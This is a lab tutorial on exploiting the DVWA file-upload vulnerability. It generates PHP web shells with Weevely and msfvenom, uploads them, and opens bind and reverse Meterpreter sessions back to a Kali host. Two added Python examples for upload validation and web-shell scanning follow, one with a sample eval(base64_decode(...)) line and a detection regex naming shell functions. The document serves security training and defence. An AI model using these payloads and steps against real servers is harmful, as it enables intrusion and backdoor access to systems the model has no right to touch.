Using Kali to Exploit Basic File Upload Vulnerability Using PHP Web Shell

File upload vulnerabilities are a well-known class of web application flaws. If an application accepts uploads without validating them, an attacker can upload a file containing malicious code that the server will then execute.

In this lab, two different tools (Weevely and msfvenom) will be used to generate a PHP web shell, which will then be uploaded to the victim server through the vulnerable file upload function on its web page.





    Pre-requisites

    Topology








    Requirements:

    Set DVWA Security level to low so we can exploit this basic file upload vulnerability.

    Upload file page: http://192.168.2.90/dvwa/vulnerabilities/upload/#

    Uploaded file path: /var/www/dvwa/hackable/uploads
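For contrast with what the DVWA low security level lets through, here is an added defensive example in Python (not part of the lab or of DVWA) showing the checks a hardened upload handler performs before it stores anything. The allowlist, size limit and storage-name scheme are assumptions chosen for illustration.

```python
import os
import re
import secrets

# Allowed extensions and the magic bytes a file claiming that type must start with
# (constructed allowlist; extend it per application).
ALLOWED = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
}
# A PHP open tag anywhere in an "image" marks a polyglot: valid picture, executable code.
PHP_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)


def validate_upload(filename, data, max_bytes=100_000):
    """Return (True, storage_name) for an acceptable file, else (False, reason).

    The checks mirror what DVWA's low level leaves out: no allowlist, no content
    inspection, and the client-chosen name written straight under the web root.
    """
    if len(data) > max_bytes:
        return False, "file too large"
    # Judge only the final extension, lower-cased: 'shell.php.jpg' becomes 'jpg' here
    # and then has to prove itself by its bytes, not by the name the client chose.
    ext = os.path.splitext(os.path.basename(filename))[1].lstrip(".").lower()
    if ext not in ALLOWED:
        return False, f"extension '{ext or '(none)'}' not allowed"
    if not data.startswith(ALLOWED[ext]):
        return False, f"content does not look like a {ext} image"
    if PHP_TAG.search(data):
        return False, "PHP code embedded in image (polyglot)"
    # Never reuse the client's name. A random name removes path and double-extension
    # tricks and stops anyone from guessing the URL of the stored file.
    # Store it outside the document root, or where the server will not execute PHP;
    # /var/www/dvwa/hackable/uploads is served by Apache, which is why this lab works.
    return True, f"{secrets.token_hex(16)}.{ext}"
```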

    Weevely – Stealth tiny php web shell

    Weevely Package Description

    Weevely is a stealth PHP web shell that simulates a telnet-like connection. It is an essential tool for web application post-exploitation, and can be used as a stealth backdoor or as a web shell to manage legitimate web accounts, even free hosted ones.

    Source: https://github.com/epinna/Weevely/
    Weevely Homepage | Kali Weevely Repo

    • Author: Weevely Developers
    • License: GPLv2

    Weevely help


    ┌──(root💀kali)-[~]
    └─# weevely -h                                                                                         2 ⨯
    usage: weevely [-h] {terminal,session,generate} ...
    
    positional arguments:
      {terminal,session,generate}
        terminal            Run terminal or command on the target
        session             Recover an existing session
        generate            Generate new agent
    
    optional arguments:
      -h, --help            show this help message and exit
                                                                                                               
    ┌──(root💀kali)-[~]
    └─# 
    
    

    weevely Usage Example

    Generate a PHP backdoor (generate) protected with the given password (Password1234).

    [email protected]:~# weevely generate Password1234 /kali/Desktop/shell.php
    [generate.php] Backdoor file 'shell.php' created with password 'Password1234'
    [email protected]:~# weevely http://192.168.2.202/dvwa/hackable/uploads/shell.php Password1234
          ________                     __
         |  |  |  |----.----.-.--.----'  |--.--.
         |  |  |  | -__| -__| |  | -__|  |  |  |
         |________|____|____|___/|____|__|___  | v1.1
                                         |_____|
                  Stealth tiny web shell

    [+] Browse filesystem, execute commands or list available modules with ':help'
    [+] Current session: 'sessions/192.168.2.202/weevely.session'

    [email protected]:/var/www $ uname
    Linux
    [email protected]:/var/www $ id
    uid=33(www-data) gid=33(www-data




    Msfvenom

    Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015. It is a command line instance of Metasploit that is used to generate and output all of the various types of shell code that are available in Metasploit.

    From the Kali terminal, run msfvenom with no arguments as shown below; it prints all available options for creating a payload.
                                                                                 
    ┌──(kali㉿kali)-[~]
    └─$ msfvenom
    Error: No options
    MsfVenom - a Metasploit standalone payload generator.
    Also a replacement for msfpayload and msfencode.
    Usage: /usr/bin/msfvenom [options] <var=val>
    Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe
    
    Options:
        -l, --list            <type>     List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
        -p, --payload         <payload>  Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
            --list-options               List --payload <value>'s standard, advanced and evasion options
        -f, --format          <format>   Output format (use --list formats to list)
        -e, --encoder         <encoder>  The encoder to use (use --list encoders to list)
            --service-name    <value>    The service name to use when generating a service binary
            --sec-name        <value>    The new section name to use when generating large Windows binaries. Default: random 4-character alpha string
            --smallest                   Generate the smallest possible payload using all available encoders
            --encrypt         <value>    The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
            --encrypt-key     <value>    A key to be used for --encrypt
            --encrypt-iv      <value>    An initialization vector for --encrypt
        -a, --arch            <arch>     The architecture to use for --payload and --encoders (use --list archs to list)
            --platform        <platform> The platform for --payload (use --list platforms to list)
        -o, --out             <path>     Save the payload to a file
        -b, --bad-chars       <list>     Characters to avoid example: '\x00\xff'
        -n, --nopsled         <length>   Prepend a nopsled of [length] size on to the payload
            --pad-nops                   Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)
        -s, --space           <length>   The maximum size of the resulting payload
            --encoder-space   <length>   The maximum size of the encoded payload (defaults to the -s value)
        -i, --iterations      <count>    The number of times to encode the payload
        -c, --add-code        <path>     Specify an additional win32 shellcode file to include
        -x, --template        <path>     Specify a custom executable file to use as a template
        -k, --keep                       Preserve the --template behaviour and inject the payload as a new thread
        -v, --var-name        <value>    Specify a custom variable name to use for certain output formats
        -t, --timeout         <second>   The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
        -h, --help                       Show this message
                                                                                 
    


    Generate Shell using php/bind_php

    $ msfvenom -p php/bind_php --list-options
    $ msfvenom -p php/bind_php LPORT=4444 -o /home/kali/Desktop/phpbind.php


    ┌──(root💀kali)-[~]
    └─# msfvenom -p php/bind_php --list-options                                                            1 ⨯
    Options for payload/php/bind_php:
    =========================
    
    
           Name: PHP Command Shell, Bind TCP (via PHP)
         Module: payload/php/bind_php
       Platform: PHP
           Arch: php
    Needs Admin: No
     Total size: 2499
           Rank: Normal
    
    Provided by:
        egypt <[email protected]>
        diaul <[email protected]>
    
    Basic options:
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
    LPORT  4444             yes       The listen port
    RHOST                   no        The target address
    
    Description:
      Listen for a connection and spawn a command shell via php
    
    
    
    Advanced options for payload/php/bind_php:
    =========================
    
        Name                     Current Setting  Required  Description
        ----                     ---------------  --------  -----------
        AutoRunScript                             no        A script to run automatically on session creation
                                                            .
        AutoVerifySession        true             yes       Automatically verify and drop invalid sessions
        CommandShellCleanupComm                   no        A command to run before the session is closed
        and
        CreateSession            true             no        Create a new session for every successful login
        InitialAutoRunScript                      no        An initial script to run on session creation (bef
                                                            ore AutoRunScript)
        VERBOSE                  false            no        Enable detailed status messages
        WORKSPACE                                 no        Specify the workspace for this module
    
    Evasion options for payload/php/bind_php:
    =========================
    
        Name  Current Setting  Required  Description
        ----  ---------------  --------  -----------
                                                                                                               
    ┌──(root💀kali)-[~]
    └─# msfvenom -p php/bind_php LPORT=4444 -o /home/kali/Desktop/phpbind.php                                       
    [-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
    [-] No arch selected, selecting arch: php from the payload
    No encoder specified, outputting raw payload
    Payload size: 2501 bytes
    Saved as: phpbind.php
    
    

    Note: remove the leading '/*' from the generated file before uploading it to DVWA.

    Launch web browser to access page: http://192.168.2.90/dvwa//hackable/uploads/phpbind.php

    Then connect to the bind shell from Kali with netcat:

    $ nc 192.168.2.90 4444


    Generate payload using php/meterpreter/reverse_tcp

    Here we use msfvenom to create a PHP payload (-p) and print it in raw format (-f raw):


    msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.2.20 lport=8888 -f raw
    

    The Kali machine 192.168.2.20 will listen on port 8888 for the connection that the victim machine opens when it executes the PHP payload.

    Copy the generated PHP code into a text editor and save it as "shell.php".

    Once the PHP file is ready, we can upload it to the web server, but before uploading it, we should start a multi-handler to listen for the incoming connection.

                                                                                                                                                                                                                                              
    ┌──(kali㉿kali)-[~]
    └─$ msfconsole 
    
    
           =[ metasploit v6.0.43-dev                          ]
    + -- --=[ 2129 exploits - 1139 auxiliary - 363 post       ]
    + -- --=[ 592 payloads - 45 encoders - 10 nops            ]
    + -- --=[ 8 evasion                                       ]
    
    Metasploit tip: After running db_nmap, be sure to 
    check out the result of hosts and services
    
    msf6 > use exploit/multi/handler
    [*] Using configured payload generic/shell_reverse_tcp
    msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
    payload => php/meterpreter/reverse_tcp
    msf6 exploit(multi/handler) > set lhost 192.168.2.20
    lhost => 192.168.2.20
    msf6 exploit(multi/handler) > set lport 8888
    lport => 8888
    msf6 exploit(multi/handler) > exploit
    
    [*] Started reverse TCP handler on 192.168.2.20:8888 
    
    
    
    Launch a web browser and access http://192.168.2.90/dvwa//hackable/uploads/shell.php, which makes the victim open a reverse connection to our Kali server 192.168.2.20. In the msfconsole window on Kali, you will see that a session has been created.
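On the defender's side, both the phpbind.php and shell.php steps above leave the same artefact: a file containing PHP under the uploads directory. The following added Python example (not part of the lab) audits such a directory for server-executable extensions, PHP open tags (including the '/*<?php' prefix the note above tells you to strip) and calls typical of web shells. The extension list and sample files are constructed for illustration; the sample PHP bodies are inert stand-ins, not the lab's payloads.

```python
import os
import re
import tempfile

# Extensions Apache's default PHP handler executes (assumed; match your AddHandler/FilesMatch).
PHP_EXTS = {".php", ".phtml", ".php3", ".php4", ".php5", ".phar"}
# A PHP open tag anywhere in the file, so msfvenom's '/*<?php /**/' prefix is still caught.
PHP_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)
# Calls typical of web shells: dynamic code, command execution, decoded payloads, sockets.
SHELL_FUNCS = re.compile(rb"\b(eval|assert|system|shell_exec|passthru|exec|popen|proc_open"
                         rb"|base64_decode|fsockopen|socket_create)\s*\(", re.IGNORECASE)


def scan_uploads(directory):
    """Return {relative_path: [reasons]} for every file in the tree that deserves a look."""
    findings = {}
    for root, _dirs, files in os.walk(directory):
        for name in files:
            path = os.path.join(root, name)
            reasons = []
            if os.path.splitext(name)[1].lower() in PHP_EXTS:
                reasons.append("server-executable extension in upload directory")
            with open(path, "rb") as fh:
                data = fh.read(512 * 1024)  # the first 512 KiB is plenty for a shell
            if PHP_TAG.search(data):
                reasons.append("contains PHP open tag")
                funcs = sorted({m.group(1).lower().decode() for m in SHELL_FUNCS.finditer(data)})
                if funcs:
                    reasons.append("calls " + ", ".join(funcs))
            if reasons:
                findings[os.path.relpath(path, directory)] = reasons
    return findings


def demo():
    """Constructed uploads directory standing in for /var/www/dvwa/hackable/uploads."""
    d = tempfile.mkdtemp()
    samples = {
        "holiday.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 64,  # a real-looking image: clean
        # shape of an msfvenom PHP payload: comment prefix, then the open tag (inert stand-in)
        "phpbind.php": b"/*<?php /**/ $port = 4444; echo 'constructed stand-in'; ?>",
        # image by name and magic bytes, PHP by content: what an extension-only check passes
        "avatar.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16 + b"<?php eval(base64_decode($_POST['x'])); ?>",
    }
    for name, body in samples.items():
        with open(os.path.join(d, name), "wb") as fh:
            fh.write(body)
    return scan_uploads(d)
```

Running scan_uploads against the real uploads path from a cron job, and alerting on any finding, catches both payloads from this lab the moment they land.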







